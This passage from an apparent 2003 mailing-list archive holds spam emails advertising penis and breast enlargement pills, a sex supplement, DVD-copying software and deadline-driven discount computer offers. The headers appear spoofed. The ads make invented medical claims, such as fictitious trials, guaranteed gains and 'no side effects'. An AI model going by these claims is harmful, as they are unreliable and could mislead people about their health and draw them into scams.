lor=3D"#FFFFFF" face=3D"verdana"> <H3>3 plus Inches!<br> Medically proven =
and verified!</H3></font><font color=3D"#FFFFFF" face=3D"verdana"><H3>100=
% Satisfaction Guaranteed!<br> Or Your Money Back!</H3></font></center>
<p align=3D"center"><font color=3D"#FFFFFF" face=3D"verdana">A medical bre=
akthrough in Science has enabled a team of 14 specialized 
  doctors to create a pill that has been designed specifically for ((penis=
 enlargement)). 
  The tests that took place over a 2 year period showed that out of the 17=
,000 
  Males from around the world who participated, the average gain after 4 m=
onths 
  of taking VP-RX pills was 3.02 Inches!</font></p><br><center><font color=
=3D"#FFFF00">
  <H2>Just as bodybuilders can increase their body mass<br>
    You can increase the size of your pe~nis !<br>
    Documented and Amazing !<br> Permanent results that will last !</H2>
  </font></center>
<center><font color=3D"#FFFFFF" font face=3D"verdana"> 
  * Gain 3+ Full Inches In Length <br>
                  * Increase 
                  Your Pe~nis Width (Girth) By 20%<br>* Stop Premature 
                  Ejaculation!<br>* Produce Stronger, 
                  Rock Hard Erections<br>* 100% Safe 
                  To Take, With NO Side Effects<br>*Fast Priority 
                  Fed-Ex Shipping WorldWide<br>* FedEx tracking 
                  numbers with all orders<br>* Doctor Approved 
                  And Recommended<br>* No Pumps! 
                  No Surgery! No Exercises!<br>* 100% Money 
                  Back Guarantee<br>* FREE Bottle 
                  Of VP-RX Worth Over $50<br>* FREE "Male 
                  Help E-Book" Worth Over $50</font></center> 

<center>
  <a href=3D"http://www.pittyu.biz/vp/?buster
 ">
      <H2>DON'T MISS OUT-CLICK HERE<BR>A MEDICALLY PROVEN PRODUCT<BR>AND A=
 100% GUARANTEE !</H2></a></center> 
<br></body>
 	  </html>vxqlp lu
mcxuot
nxam jgluyxz ew t
khr
yjbgceyr lmagq ithhz 

--_.13.FFD.A12.43E3AA.--


From billy@msn.com Sun Dec 28 14:04:13 2003
Return-Path: <billy@msn.com>
Received: from 69-160-218-212.clvdoh.adelphia.net (69-160-218-212.clvdoh.adelphia.net [69.160.218.212])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBSJ4CMN022447;
	Sun, 28 Dec 2003 14:04:12 -0500 (EST)
Received: from (HELO s4eg) [60.174.46.62]
	by 69-160-218-212.clvdoh.adelphia.net;
	Mon, 29 Dec 2003 07:58:43 -0100
Message-ID: <6ok16b-9rwo$qv2t---$$70l5r@77ta4q4n.fx7>
From: "Jacob Reagan" <billy@msn.com>
Reply-To: "Jacob Reagan" <billy@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Fella's what the big boys use!! bpzg nxipghstouxz
Date: Mon, 29 Dec 03 07:58:43 GMT
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="0E7E_8.0C.0FD3EDB2"
X-Priority: 3
X-MSMail-Priority: Normal


--0E7E_8.0C.0FD3EDB2
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>Fella's what the big boys use!! bpzg nxipghstouxz
<head>
<body bgcolor=3D"#000099" font color=3D"#FFFFFF"  link=3D"#FF00FF"
alink=3D=
"#FF00FF" vlink=3D"#FF00FF" text=3D"#006666">
<center><font color=3D"#FFFFFF" face=3D"verdana">
  <H3>Penis enlargement is proven to be quite possible</H3></font><font co=
lor=3D"#FFFFFF" face=3D"verdana"> <H3>3 plus Inches!<br> Medically proven =
and verified!</H3></font><font color=3D"#FFFFFF" face=3D"verdana"><H3>100=
% Satisfaction Guaranteed!<br> Or Your Money Back!</H3></font></center>
<p align=3D"center"><font color=3D"#FFFFFF" face=3D"verdana">A medical bre=
akthrough in Science has enabled a team of 14 specialized 
  doctors to create a pill that has been designed specifically for ((penis=
 enlargement)). 
  The tests that took place over a 2 year period showed that out of the 17=
,000 
  Males from around the world who participated, the average gain after 4 m=
onths 
  of taking VP-RX pills was 3.02 Inches!</font></p><br><center><font color=
=3D"#FFFF00">
  <H2>Just as bodybuilders can increase their body mass<br>
    You can increase the size of your pe~nis !<br>
    Documented and Amazing !<br> Permanent results that will last !</H2>
  </font></center>
<center><font color=3D"#FFFFFF" font face=3D"verdana"> 
  * Gain 3+ Full Inches In Length <br>
                  * Increase 
                  Your Pe~nis Width (Girth) By 20%<br>* Stop Premature 
                  Ejaculation!<br>* Produce Stronger, 
                  Rock Hard Erections<br>* 100% Safe 
                  To Take, With NO Side Effects<br>*Fast Priority 
                  Fed-Ex Shipping WorldWide<br>* FedEx tracking 
                  numbers with all orders<br>* Doctor Approved 
                  And Recommended<br>* No Pumps! 
                  No Surgery! No Exercises!<br>* 100% Money 
                  Back Guarantee<br>* FREE Bottle 
                  Of VP-RX Worth Over $50<br>* FREE "Male 
                  Help E-Book" Worth Over $50</font></center> 

<center>
  <a href=3D"http://www.pittyu.biz/vp/?buster
 ">
      <H2>DON'T MISS OUT-CLICK HERE<BR>A MEDICALLY PROVEN PRODUCT<BR>AND A=
 100% GUARANTEE !</H2></a></center> 
<br></body>
 	  </html>haqucakwc

--0E7E_8.0C.0FD3EDB2--


From jasper@msn.com Sun Dec 28 14:21:44 2003
Return-Path: <jasper@msn.com>
Received: from 160.36.58.108 ([61.191.113.104])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBSJLcMN022618;
	Sun, 28 Dec 2003 14:21:40 -0500 (EST)
Received: from [85.70.205.133] by 160.36.58.108 with ESMTP id <282147-09344>; Mon, 29 Dec 2003 07:18:09 -0200
Message-ID: <d1n7e-9$3bm-a@sl9w06>
From: "Gayle Aguirre" <jasper@msn.com>
Reply-To: "Gayle Aguirre" <jasper@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Will she dump you for another? Not with alpha bwsbzmk un h m
Date: Mon, 29 Dec 03 07:18:09 GMT
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary=".BDBB_B70D"
X-Priority: 3
X-MSMail-Priority: Normal


--.BDBB_B70D
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>Will she dump you for another? Not with alpha bwsbzmk un h m
<head>
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">

</head>

<body bgcolor=3D"#FFFFFF" text=3D"#FFFFFF" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#000000" face=3D"verdana">You can be a sex mach=
ine</font></h3></center><center><h4><font color=3D"#FF0000" face=3D"verdan=
a">Finally available to the public<br>The supplement that's made Male Porn=
 Stars famous!</font></h4></center><center>
  <h5><font color=3D"#000000" face=3D"verdana">Make love to her like no ot=
her man 
    can<br>Over and over again  All night long!<br>
     Before she can catch her breath, mount her again and again,<br> pleas=
uring her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars=
 shoot an entire movie in just ONE DAY having sex<br> many times with many=
 different women!<br>THEY WEREN'T BORN THAT WAY!<br>
    Now you too can have rock hard orgasmic sex over and over again<br>wit=
h huge cum gushing 
    ejaculations while your penis remains hard and ready for more!<br>
    Just like the hottest "IN DEMAND" male stars in the world of Adult Por=
n</FONT></H5></CENTER><CENTER><h5><font color=3D"#FF0000" face=3D"verdana"=
>**YOU TOO WILL BE IN DEMAND**</FONT></H5></CENTER><CENTER><h5><font color=
=3D"#000000" face=3D"verdana">Increase your testosterone 500%<br>Increase =
your sex drive---Increase your virility<br>Dramatically increase the amoun=
t of semen you ejaculate<br>Never again experience premature ejaculation<b=
r>
    She'll never leave you alone when you give her hours of multiple orgas=
ms<br>
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://www.pittyu.biz/alpha/?buster">Find Alpha Male Here</a></=
h2></center>
clyszyc bzw 
kbm jfkvukbhajz ww
</body>
</html>
qznv l itx
t iduwqqjhqkjnop jftbwsau i

--.BDBB_B70D--


From jasper@msn.com Sun Dec 28 14:47:41 2003
Return-Path: <jasper@msn.com>
Received: from pc-62-31-95-8-bl.blueyonder.co.uk (pc-62-31-95-8-bl.blueyonder.co.uk [62.31.95.8])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBSJlbMN022977;
	Sun, 28 Dec 2003 14:47:38 -0500 (EST)
Received: from [77.195.3.149] by pc-62-31-95-8-bl.blueyonder.co.uk with ESMTP id 55194517; Mon, 29 Dec 2003 07:44:06 -0200
Message-ID: <5-uywf0dy$wi@kcb.2w.z.6b.ni>
From: "Jessica Hendricks" <jasper@msn.com>
Reply-To: "Jessica Hendricks" <jasper@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: She will never forget you with this, t
Date: Mon, 29 Dec 03 07:44:06 GMT
X-Mailer: Microsoft Outlook, Build 10.0.2627
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="_.407BEDB9A_4"
X-Priority: 3
X-MSMail-Priority: Normal


--_.407BEDB9A_4
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>She will never forget you with this, t
<head>
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">

</head>

<body bgcolor=3D"#FFFFFF" text=3D"#FFFFFF" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#000000" face=3D"verdana">You can be a sex mach=
ine</font></h3></center><center><h4><font color=3D"#FF0000" face=3D"verdan=
a">Finally available to the public<br>The supplement that's made Male Porn=
 Stars famous!</font></h4></center><center>
  <h5><font color=3D"#000000" face=3D"verdana">Make love to her like no ot=
her man 
    can<br>Over and over again  All night long!<br>
     Before she can catch her breath, mount her again and again,<br> pleas=
uring her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars=
 shoot an entire movie in just ONE DAY having sex<br> many times with many=
 different women!<br>THEY WEREN'T BORN THAT WAY!<br>
    Now you too can have rock hard orgasmic sex over and over again<br>wit=
h huge cum gushing 
    ejaculations while your penis remains hard and ready for more!<br>
    Just like the hottest "IN DEMAND" male stars in the world of Adult Por=
n</FONT></H5></CENTER><CENTER><h5><font color=3D"#FF0000" face=3D"verdana"=
>**YOU TOO WILL BE IN DEMAND**</FONT></H5></CENTER><CENTER><h5><font color=
=3D"#000000" face=3D"verdana">Increase your testosterone 500%<br>Increase =
your sex drive---Increase your virility<br>Dramatically increase the amoun=
t of semen you ejaculate<br>Never again experience premature ejaculation<b=
r>
    She'll never leave you alone when you give her hours of multiple orgas=
ms<br>
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://www.pittyu.biz/alpha/?buster">Find Alpha Male Here</a></=
h2></center>
y f i jsl
zignkz  qzj   o
konmf
bxkw j jdlj qmb mlzmgjxciludfgkqhvve
pebw
qfyej
 gfu 
</body>
</html>
ygdisys ehb z  seggcxhiccuu csrlz derr
dy  citwihjxpwv t x  jxtq
drndsqzo

--_.407BEDB9A_4--


From Personnel@selu.com.ar Sun Dec 28 15:55:17 2003
Return-Path: <Personnel@selu.com.ar>
Received: from 160.36.58.108 ([218.22.48.211])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBSKtAMN024614;
	Sun, 28 Dec 2003 15:55:13 -0500 (EST)
Received: from jg.1sr5n08.com ([20.99.44.150])
	by 160.36.58.108 with ESMTP id 28658868;
	Sun, 28 Dec 2003 21:53:22 +0100
Message-ID: <a-5$9-c$bk23-ea99@wvx.rw3x>
From: "Admin" <Personnel@selu.com.ar>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: Attention All  Staff and Personnel:
Date: Sun, 28 Dec 03 21:53:22 GMT
X-Priority: 1
X-MSMail-Priority: High
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary=".5D31F_FEC.C37.937"

This is a multi-part message in MIME format.

--.5D31F_FEC.C37.937
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

Attention All Staff and Personnel:

You Must Respond By 5 P.M. Tuesday, December 30, 2003

Through a special arrangement, Avtech Direct is offering a limited
allotment of BRAND NEW, top of-the-line, name-brand desktop computers
at 50% off MSRP to all who respond to this message
before 5 P.M., Tuesday, December 30, 2003.

All desktop computers are brand-new packed in their original boxes,
and come with a full manufacturer's warranty plus
a 100% satisfaction guarantee.

These professional grade Desktops are fully equipped with 2004
next generation technology, making these the best performing
computers money can buy.

Avtech Direct is offering these feature rich, top performing
Desktops with the latest Intel technology at an amazing price
to All Staff and Personnel who call:

    1-800-884-9510 by 5 P.M.  Tuesday, December 30, 2003

The fast and powerful AT-2400 series Desktop features: 

      * Intel 2.0Ghz Processor for amazing speed and performance
      * 128MB DDR RAM,  Upgradeable to 1024
      * 20 GB UDMA Hard Drive, Upgradeable to 80 GB
      * 52X CD-Rom Drive, Upgradeable to DVD/CDRW 
      * 1.44 Floppy disk drive
      * Next Generation Technology
      * ATI Premium video and sound
      * Full Connectivity with Fax modem/Lan/IEE 1394/USB 2.0
      * Soft Touch Keyboard and scroll mouse
      * Internet Ready
      * Network Ready
      * 1 Year parts and labor warranty
      * Priority customer service and tech support

MSRP $699 ........................................ Your Cost $347

How to qualify:

  1. You must be a Medical Staff Member, Teacher or Student.
  2. All desktop computers will be available on a
     first come first serve basis.
  3. You must call 1-800-884-9510 by 5 P.M. Tuesday, December 30, 2003
     and we will hold the desktops you request on will call. 
  4. You are not obligated in any way.
  5. 100% Satisfaction Guaranteed.
   
   
Call Avtech Direct
1-800-884-9510 before 5 P.M. Tuesday, December 30, 2003
--.5D31F_FEC.C37.937--


From Personnel@selu.com.ar Mon Dec 29 01:42:17 2003
Return-Path: <Personnel@selu.com.ar>
Received: from dsl-200-67-245-74.prod-infinitum.com.mx (dsl-200-67-245-74.prod-infinitum.com.mx [200.67.245.74])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBT6g3MN001936;
	Mon, 29 Dec 2003 01:42:08 -0500 (EST)
Received: from jps.khyy2f.net ([176.49.188.114])
	by dsl-200-67-245-74.prod-infinitum.com.mx with ESMTP id CE61CBDAA7A
	for <blast-funct-archive@netlib2.cs.utk.edu>; Mon, 29 Dec 2003 03:39:27 -0300
Message-ID: <ub1628a7$$w52$2jv$s@5nap2>
From: "Admin" <Personnel@selu.com.ar>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: Attention All  Staff and Personnel:
Date: Mon, 29 Dec 03 03:39:27 GMT
X-Priority: 1
X-MSMail-Priority: High
X-Mailer: Microsoft Outlook, Build 10.0.2616
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="C_._6..C7A.41F"

This is a multi-part message in MIME format.

--C_._6..C7A.41F
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

Attention All Staff, Personnel, and Students:

You must respond by 5 P.M. Tuesday, December 30, 2003

Avtech Direct a leading computer manufacturer is offering a
limited allotment of BRAND NEW, top of-the-line, name-brand
laptop computers at 50% off MSRP to all Who respond to this
message before: 5 P.M. Tuesday, December 30, 2003


All laptops are brand-new packed in their original boxes and
come with a full manufacturer's warranty plus a
100% satisfaction guarantee.

These professional grade laptops are lightweight and fully
equipped with the next generation WiFi technology, making these
the very best performing computers that money can buy.

Avtech Direct is offering these feature rich, top performing laptops
with the latest Wireless technology at an amazing price
to all Teachers, Students, Faculty and Staff who call:

     1-800-318-1388 by 5 P.M. Tuesday, December 30, 2003

Laptop AT-1000S Series- Sleek, Slim and Wireless Ready

   * 1 Giga Pro Transmeta Crusoe CPU for incredible power
   * 128 MB SD RAM, Upgradeable to 256
   * 20 GB Hard Drive upgradeable to 30 GB
   * CD-Rom Drive upgradeable to  DVD/CDRW 
   * WiFi Next Generation Wireless Technology for total freedom
   * 14.1 XGA TFT Ultra Sharp Liquid Display
   * Premium Sound and Video
   * Total Connectivity 56k v90 fax modem, 10/100 T-base LAN Net Card 
   * 1394 Fire wire and USB 2.0 Ports
   * Soft Touch Keyboard
   * Internet and Network Ready
   * Extra Long Life Battery Pack
   * 1 Year parts and labor warranty with
   * Priority customer service and tech support

MSRP $1299 ......................................... Your Cost $647


Laptop AT-2000 Series Plenty of Power and Wireless Ready

     * 2.0 Intel Processor for outstanding  speed and performance
     * 256 MB SD RAM, Upgradeable to 512 MB
     *  CD Rewriteable and DVD Combo Drive
     * 20 GB Hard Drive upgradeable to 40 GB
     * WiFi Ready-Next Generation Wireless Technology for total freedom
     * 15.1 XGA TFT Ultra Sharp Liquid Display
     * Premium Sound and Video 
     * Total Connectivity 56k v90 fax modem, 10/100 T-base LAN Net Card
     * 1394 Fire wire and USB 2.0 Ports
     * Soft Touch Keyboard
     * Internet and Network Ready
     * Long Life Battery Pack
     * 1 Year parts and labor warranty with
     * Priority customer service and tech support

MSRP $1999 ......................................... Your Cost $947

How to qualify:

   1. You must be a Student or Staff Member.
   2. All laptop computers will be available on a
      first come first serve basis.
   3. You must call 1-800-318-1388 by 5 P.M. Tuesday, December 30, 2003
      and we will hold the laptops you request on will call. 
   4. You are not obligated in any way.
   5. All computers are 100% Satisfaction Guaranteed


Avtech Direct 1-800-318-1388 by 5 P.M. Tuesday, December 30, 2003

Special bonus offer for the first 10 customers who purchase by Thursday.
--C_._6..C7A.41F--


From 84yjhtip@gawab.com Mon Dec 29 12:28:27 2003
Return-Path: <84yjhtip@gawab.com>
Received: from 160.36.58.108 ([81.13.225.14])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBTHSOMN014214;
	Mon, 29 Dec 2003 12:28:25 -0500 (EST)
Received: from [251.62.171.39] by 160.36.58.108 with ESMTP id <111018-36518>; Mon, 29 Dec 2003 17:22:20 +0000
Message-ID: <7z1b62k0$dk3$6$o2yqa-z@g26.5ufv>
From: "Lorrie Mccauley" <84yjhtip@gawab.com>
Reply-To: "Lorrie Mccauley" <84yjhtip@gawab.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: Copy DVDs to your computer and watch on your computer megahertz
Date: Mon, 29 Dec 2003 17:22:20 GMT
X-Mailer: Mirinda mailer
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="_6741B.9_5.4"
X-Priority: 3
X-MSMail-Priority: Normal


--_6741B.9_5.4
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>

<head>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dwindows-=
1252">
<title>Easy DVD KIT </title>
</head>

<body>
<p align=3D"left">
<b><font face=3D"Verdana"><font color=3D"#236801" size=3D"5"><i>Easy DVD K=
IT  </i>&nbsp;</font><font size=3D"2"><br>
</font></font><font face=3D"verdana" size=3D"2">
<hr color=3D"#236801" SIZE=3D"1">
</font></b>
<p align=3D"left"><b><font face=3D"Verdana" size=3D"2">Easy DVD KIT  is a =
powerful tool to COPY DVD movies to&nbsp;<br>
    VCD/SVCD with just one click on your PC!&nbsp;<br>
    Copy DVD movies to CD-R discs, convert DVD to VCD/SVCD, with&nbsp;<br>=

    BACKUP-DVD it couldn't be easier! <a href=3D"http://www.best-soft.biz/=
">(see
    more)</a><br>
    </font></b>
<p align=3D"left"><b><font face=3D"Verdana" size=3D"2">Copying a DVD is no=
t difficult at all. Our guide includes detailed&nbsp;<br>
    instructions and , which are easy to follow, even for a beginner!<a hr=
ef=3D"http://www.best-soft.biz/">(see
    more)</a><br>
     
    </font></b>
<p align=3D"left"><b><font face=3D"Verdana" size=3D"2">Learn how to burn D=
VD's onto regular CD-R Discs!<br>
    Watch your new movies on any DVD player!<br>
    not just the computer DVD! <a href=3D"http://www.best-soft.biz/">(see
    more)</a></font></b>
<p align=3D"left"><b><font face=3D"Verdana" size=3D"2">Copy DVD movies usi=
ng your CD writer with just one click:<br>
    Put DVD into the DVD drive, a blank CDR in the CD writer, click&nbsp;<=
br>
    "Start" and go!&nbsp; Support DVD to VCD image, VCD image to CDRW&nbsp=
;<br>
    Support almost all popular CD writers.<a href=3D"http://www.best-soft.=
biz/">(see
    more)</a></font></b>
<p align=3D"left"><font face=3D"Verdana" size=3D"2"><b>&nbsp;&nbsp;&nbsp;&=
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;<br>
 
<br>
EASY DVD KIT=FFFFFFA0 is the Best!! Make quality backups of your&nbsp;<br>
personal DVDs. Create your own DVD library. Never worry&nbsp;<br>
about scratching or losing a DVD again!<br>
 
<br>
<font color=3D"#0000FF"><a href=3D"http://www.best-soft.biz/">DOWNLOAD
NOW !</a></font><br>
 
<br>
<br>
Easy DVD KIT <br>
<br>
  
</b><br>
<br>
<br>
</font></p>

</body>

</html>
nithtiji wmfspfjkbsgqm hhlc ydrobg
 hxvug

--_6741B.9_5.4--


From zane@msn.com Mon Dec 29 18:42:37 2003
Return-Path: <zane@msn.com>
Received: from h24-82-34-255.vs.shawcable.net (h24-82-34-255.vs.shawcable.net [24.82.34.255])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBTNgOMN021884;
	Mon, 29 Dec 2003 18:42:28 -0500 (EST)
Received: from [120.177.129.147] by h24-82-34-255.vs.shawcable.net id <3273814-00703>; Tue, 30 Dec 2003 15:34:48 +0200
Message-ID: <93-$--8tdrxmxk0--$2f9tqk55@0prnd5>
From: "Nola Mcleod" <zane@msn.com>
Reply-To: "Nola Mcleod" <zane@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: ''Increase those bustlines NATURALLY! D.o*c's prove it! shspzbf dhyojyq
Date: Tue, 30 Dec 03 15:34:48 GMT
X-Mailer: Microsoft Outlook Express 5.00.2919.6700
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="7..BAE1A_73B_E6F"
X-Priority: 3
X-MSMail-Priority: Normal


--7..BAE1A_73B_E6F
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<head>
<title>Untitled Document</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>

<body bgcolor=3D"#FFFFFF" text=3D"#000099" link=3D"#0000FF" alink=3D"0000f=
f" vlink=3D"#0000FF">
<center>
<H3>BreastSuccess can be yours<br>Safely and Naturally!</H3>
Increase Breast Fullness.. 1 - 3 Cup Sizes<br>
    Improve Breast Firmness for a shaplier and sexier YOU!<br>
Be sexier with safe and natural herbs<br>Herbal nutrients responsible for =
thousands of positive results in Europe <br>Hundreds of thousands of women=
 are already enjoying ASTOUNDING results! <br> And you can too !</H3>
    <H4>100% Satisfaction Guaranteed!<br>
    Doctor Approved!</H4>We're so impressed with this product<br> that we =
gladly offer a 100% Money Back Guarantee <br>so there's nothing to lose!</=
H2></center><br><center><h2><a href=3D"http://www.pittyu.biz/breast/?buste=
r">This way to a new figure safely!</a></H2></center>
jcsmf sfb gfyk dca  d xlxm enkmr  
ranqs
po
</body>
</html>
pnivgtmdhd
czudbickjgynb ord st avm

--7..BAE1A_73B_E6F--


From zane@msn.com Mon Dec 29 19:08:28 2003
Return-Path: <zane@msn.com>
Received: from h24-82-34-255.vs.shawcable.net (h24-82-34-255.vs.shawcable.net [24.82.34.255])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBU08PMN022121;
	Mon, 29 Dec 2003 19:08:26 -0500 (EST)
Received: from [138.164.76.208] by h24-82-34-255.vs.shawcable.net with ESMTP id 6ECAB723429; Tue, 30 Dec 2003 18:58:41 +0500
Message-ID: <pz$--z5k6$e3@9za.xieo4y.h90>
From: "Lucy Rodriquez" <zane@msn.com>
Reply-To: "Lucy Rodriquez" <zane@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: START. BUYING BIGGER BRA'S! THIS WILL WORK!  z  lbugkgmeu qk
Date: Tue, 30 Dec 03 18:58:41 GMT
X-Mailer: Microsoft Outlook Express 5.00.2615.200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="_4.71739CDBC7BF42.8.E..9"
X-Priority: 3
X-MSMail-Priority: Normal


--_4.71739CDBC7BF42.8.E..9
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<head>
<title>Untitled Document</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>

<body bgcolor=3D"#FFFFFF" text=3D"#000099" link=3D"#0000FF" alink=3D"0000f=
f" vlink=3D"#0000FF">
<center>
<H3>BreastSuccess can be yours<br>Safely and Naturally!</H3>
Increase Breast Fullness.. 1 - 3 Cup Sizes<br>
    Improve Breast Firmness for a shaplier and sexier YOU!<br>
Be sexier with safe and natural herbs<br>Herbal nutrients responsible for =
thousands of positive results in Europe <br>Hundreds of thousands of women=
 are already enjoying ASTOUNDING results! <br> And you can too !</H3>
    <H4>100% Satisfaction Guaranteed!<br>
    Doctor Approved!</H4>We're so impressed with this product<br> that we =
gladly offer a 100% Money Back Guarantee <br>so there's nothing to lose!</=
H2></center><br><center><h2><a href=3D"http://www.pittyu.biz/breast/?buste=
r">This way to a new figure safely!</a></H2></center>
iropfo g
k
 isvrbyr
k irssawxmtwpcm wda b
kzdoyoqv
</body>
</html>
mxztawmd kwnsjybgx bwcvb

--_4.71739CDBC7BF42.8.E..9--


From Personnel@selu.com.ar Tue Dec 30 04:16:40 2003
Return-Path: <Personnel@selu.com.ar>
Received: from 160.36.58.108 ([202.88.133.18])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBU9FnMN003348;
	Tue, 30 Dec 2003 04:16:09 -0500 (EST)
Received: from 1k.sbbh3.org ([146.224.248.148]) by 160.36.58.108 SMTP id 5YJw2wdW0D2b49; Tue, 30 Dec 2003 15:17:08 +0600
Message-ID: <q8$$2hf$5-tyni@2o7.lxx>
From: "Admin" <Personnel@selu.com.ar>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: Attention All  Staff and Personnel:
Date: Tue, 30 Dec 03 15:17:08 GMT
X-Priority: 1
X-MSMail-Priority: High
X-Mailer: Microsoft Outlook, Build 10.0.2616
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="9.483655468B.3EBCC____B6"

This is a multi-part message in MIME format.

--9.483655468B.3EBCC____B6
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

Attention All Staff and Personnel:

You Must Respond By 5 P.M. Wednesday, December 31, 2003

Through a special arrangement, Avtech Direct is offering a limited
allotment of BRAND NEW, top of-the-line, name-brand desktop computers
at 50% off MSRP to all who respond to this message before
5 P.M.,Wednesday, December 31, 2003

All desktop computers are brand-new packed in their original boxes,
and come with a full manufacturer's warranty plus
a 100% satisfaction guarantee.

These professional grade Desktops are fully equipped with 2004
next generation technology, making these the best performing
computers money can buy.

Avtech Direct is offering these feature rich, top performing
Desktops with the latest Intel technology at an amazing price
to all who call:

    1-800-884-9510 by 5 P.M. Wednesday, December 31, 2003

The fast and powerful AT-2400 series Desktop features: 

      * Intel 2.0Ghz Processor for amazing speed and performance
      * 128MB DDR RAM,  Upgradeable to 1024
      * 20 GB UDMA Hard Drive, Upgradeable to 80 GB
      * 52X CD-Rom Drive, Upgradeable to DVD/CDRW 
      * 1.44 Floppy disk drive
      * Next Generation Technology
      * ATI Premium video and sound
      * Full Connectivity with Fax modem/Lan/IEE 1394/USB 2.0
      * Soft Touch Keyboard and scroll mouse
      * Internet Ready
      * Network Ready
      * 1 Year parts and labor warranty
      * Priority customer service and tech support

MSRP $699 ........................................ Your Cost $347

How to qualify:

  1. You must be a Staff Member
  2. All desktop computers will be available on a
     first come first serve basis.
  3. You must call 1-800-884-9510 by 5 P.M. Wednesday, December 31, 2003
     and we will hold the desktops you request on will call. 
  4. You are not obligated in any way.
  5. 100% Satisfaction Guaranteed.
   
   
Call Avtech Direct
1-800-884-9510 before 5 P.M. Wednesday, December 31, 2003
--9.483655468B.3EBCC____B6--


From 35422g7h@yahoo.com Tue Dec 30 17:10:30 2003
Return-Path: <35422g7h@yahoo.com>
Received: from pa-plum2a-249.pit.adelphia.net (pa-plum2a-249.pit.adelphia.net [68.65.128.249])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBUMASMN014708;
	Tue, 30 Dec 2003 17:10:29 -0500 (EST)
Received: from [81.27.96.1] by pa-plum2a-249.pit.adelphia.net with SMTP; Tue, 30 Dec 2003 20:08:51 -0200
Message-ID: <8-v$9$$-96gd6j3vx--ay-jt@uufw.x.46.c7>
From: "Elbert Mccabe" <35422g7h@yahoo.com>
Reply-To: "Elbert Mccabe" <35422g7h@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
